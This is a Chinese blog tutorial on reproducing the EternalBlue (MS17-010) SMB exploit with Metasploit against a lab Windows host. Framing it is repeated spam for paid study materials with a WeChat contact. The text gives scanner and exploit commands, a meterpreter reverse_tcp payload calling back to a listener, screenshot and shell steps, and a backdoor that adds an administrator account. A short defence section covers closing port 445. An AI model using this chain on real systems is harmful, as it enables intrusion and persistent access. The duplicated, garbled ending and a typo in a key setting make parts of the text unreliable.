EternalBlue【永恒之蓝】漏洞详解（复现、演示、远程，淘汰了80%的网络安全面试者

先自我介绍一下，小编浙江大学毕业，去过华为、字节跳动等大厂，目前阿里P7

深知大多数程序员，想要提升技能，往往是自己摸索成长，但自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！

因此收集整理了一份《2024年最新网络安全全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，涵盖了95%以上网络安全知识点，真正体系化！

由于文件比较多，这里只是将部分目录截图出来，全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频，并且后续会持续更新

如果你需要这些资料，可以添加V获取：vip204888 （备注网络安全）

正文

此状态表示进入MSF框架成功

利用探测漏洞模块

db_status #查看是否进入MSF攻击服务
search ms17_010 #查找探测模块
use auxiliary/scanner/smb/smb_ms17_010 #利用探测模块
show options #查看配置参数
set rhost 192.168.244.133/32 #设置探测主机段
set threads 20 #设置探测线程
run/exploit #执行探测

探测出likely表示可能存在漏洞！

利用永恒之蓝模块

use exploit/windows/smb/ms17_010_eternalblue #利用ms17_010永恒之蓝漏洞
set rhost 192.168.244.133 #设置攻击目标IP
set payload windows/x64/meterpreter/reverse_tcp #设置攻击载荷（木马信息）
set lhost 192.168.244.136 #设置监听主机IP
set lpost 445 #设置监听端口
run/exploit #执行攻击

运行成功后会出现meterpreter>
Meterpreter俗称"黑客瑞士军刀"

想要深入了解可以看以下内容

Meterpreter是Metasploit框架中的一个扩展模块，作为溢出成功后的攻击载荷使用。它可以在触发漏洞后返回一个由攻击者控制的通道，以便远程执行命令。

Meterpreter的功能丰富，例如添加用户、隐藏某些内容、打开shell、获取用户密码、上传和下载远程主机的文件、运行cmd.exe、捕捉屏幕、获取远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等。此外，Meterpreter可以躲避入侵检测系统，在远程主机上隐藏自己，不改变系统硬盘中的文件，因此HIDS（基于主机的入侵检测系统）很难对它做出响应。

Meterpreter还可以简化任务创建多个会话，利用这些会话进行渗透。在Metasploit Framework中，Meterpreter是一种后渗透工具，它属于一种在运行过程中可通过网络进行功能扩展的动态可扩展型Payload。这种工具是基于“内存DLL注入”理念实现的，它能够通过创建一个新进程并调用注入的DLL来让目标系统运行注入的DLL文件。其中，攻击者与目标设备中Meterpreter的通信是通过Stager套接字实现的。

Meterpreter作为后渗透模块有多种类型，并且命令由核心命令和扩展库命令组成，极大的丰富了攻击方式。此外，Meterpreter还支持Ruby脚本形式的扩展。

远程查看靶机信息和捕捉屏幕

sysinfo #查看靶机系统信息
getuid #查看靶机用户身份
screenshot #对靶机当前屏幕进行截图

需要注意的是最后一部屏幕截图保存到了根目录下
根目录下受权限保护可能查看不了图片
解决方法有两种改权限或者复制到桌面上 在这里讲的是第二种方法

cp EoiLSMEC.jpeg '/home/kali/桌面/flag1.png'

进入靶机控制台

shell #进入靶机cmd终端

成功进入靶机C:\Windows\system32路径下

对靶机进行后门植入

#创建新管理员用户
net user baimao 123 /add
#将baimao用户加入到本地管理员组当中
net localgroup administrators baimao /add
#查看本地管理员组当中的用户成员
net localgroup administrators
#查看此路径下的所有文件和目录
dir

与图片中信息相同就代表后门植入成功
exit可以退回meterpreter路径下

查看靶机当前用户

whoami

创建文件夹

mkdir baimao

exit可以退出MSF框架

如何防御

开启防火墙

防火墙开启路径
控制面板->系统和安全->Windows 防火墙

禁用靶机139和445端口

查看靶机445端口是否开启

netstat -ant

可以看到445端口是开启状态

禁用靶机445端口路径
控制面板->系统和安全->Windows 防火墙

禁用server服务

win+r 运行
输入services.msc

关闭不必要的服务

关闭服务路径
控制面板->系统和安全->Windows 防火墙

根据需要可以选择关闭与否

注册表关闭445端口

win+r 运行
输入regedit进入注册表

找到此注册表路径
根据自己系统位数进行修改64位就选择QWORD
HKEY_LOCAL_MACHINE\System\Controlset\Services\NetBT\Parameters

重命名为SMBDeviceEnabled

右键->修改->数值数据的值为0（0代表关闭，1代表打开),点击确定,完成设置 。

重启之后查看445端口是否关闭！

可以看到445端口已经不见了！

安装杀毒软件

360安全卫士与火绒安全软件成功阻止了永恒之蓝！

大家想要了解的，可以参考下！
360安全卫士和火绒安全软件都是知名的电脑安全软件，具有多种防护功能。
360安全卫士是一款全面而高效的电脑安全防护软件，它拥有强大的查杀能力，可以检测和清除电脑中的病毒、木马、恶意程序等安全隐患。同时，它还提供了多种实用的功能，如实时监控、木马查杀、漏洞修复等，可以帮助用户保护电脑安全，提高使用体验。
火绒安全软件则是一款以防护为主打功能的电脑安全软件，它拥有自主知识产权的新一代反病毒引擎，能够检测和分析恶意程序，提供全面的防护功能。此外，火绒安全软件还拥有钩子扫描功能，可以快速扫描指定进程，发现潜在的安全风险。

网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。

需要这份系统化的资料的朋友，可以添加V获取：vip204888 （备注网络安全）

一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！

保护电脑安全，提高使用体验。

火绒安全软件则是一款以防护为主打功能的电脑安全软件，它拥有自主知识产权的新一代反病毒引擎，能够检测和分析恶意程序，提供全面的防护功能。此外，火绒安全软件还拥有钩子扫描功能，可以快速扫描指定进程，发现潜在的安全风险。

网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。

需要这份系统化的资料的朋友，可以添加V获取：vip204888 （备注网络安全）
[外链图片转存中…(img-ey0wfwcA-1713131530950)]

一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！